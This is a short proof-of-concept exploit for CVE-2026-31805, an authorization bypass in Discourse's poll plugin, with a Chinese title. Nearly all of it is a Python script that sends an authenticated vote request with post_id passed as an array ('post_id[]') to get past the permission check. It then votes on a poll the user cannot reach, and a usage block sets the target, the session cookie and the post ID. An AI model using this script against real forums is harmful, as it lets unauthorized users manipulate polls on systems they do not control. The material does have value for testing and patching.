CVE-2026-31805 Discourse投票插件授权绕过漏洞

# PoC for CVE-2026-31805 # Description: Exploit authorization bypass by passing post_id as an array. import requests def exploit_discourse_poll(target_url, session_cookie, target_post_id, poll_name, option_id): """ Attempts to vote on a poll without authorization using array parameter pollution. """ # Vulnerable endpoint for voting endpoint = f"{target_url}/polls/vote" # Headers with a valid user session (Authentication required as per description) headers = { "Cookie": f"_forum_session={session_cookie}", "Content-Type": "application/x-www-form-urlencoded" } # Payload: Passing post_id as an array to bypass authorization checks # The authorization check might validate an empty or accessible ID, # while the poll logic uses the target_post_id. data = { "post_id[]": ["", str(target_post_id)], "poll_name": poll_name, "option_id": str(option_id) } try: response = requests.post(endpoint, headers=headers, data=data) if response.status_code == 200: print("[+] Request sent successfully. Check if vote was registered.") print(f"[+] Response: {response.text}") else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}") if __name__ == "__main__": # Example usage configuration TARGET = "http://localhost:3000" # Attacker's session cookie (Description states 'authenticated users') SESSION = "valid_session_cookie_here" TARGET_POST = "12345" # ID of the post containing the poll POLL = "poll_name" OPTION = "1" exploit_discourse_poll(TARGET, SESSION, TARGET_POST, POLL, OPTION)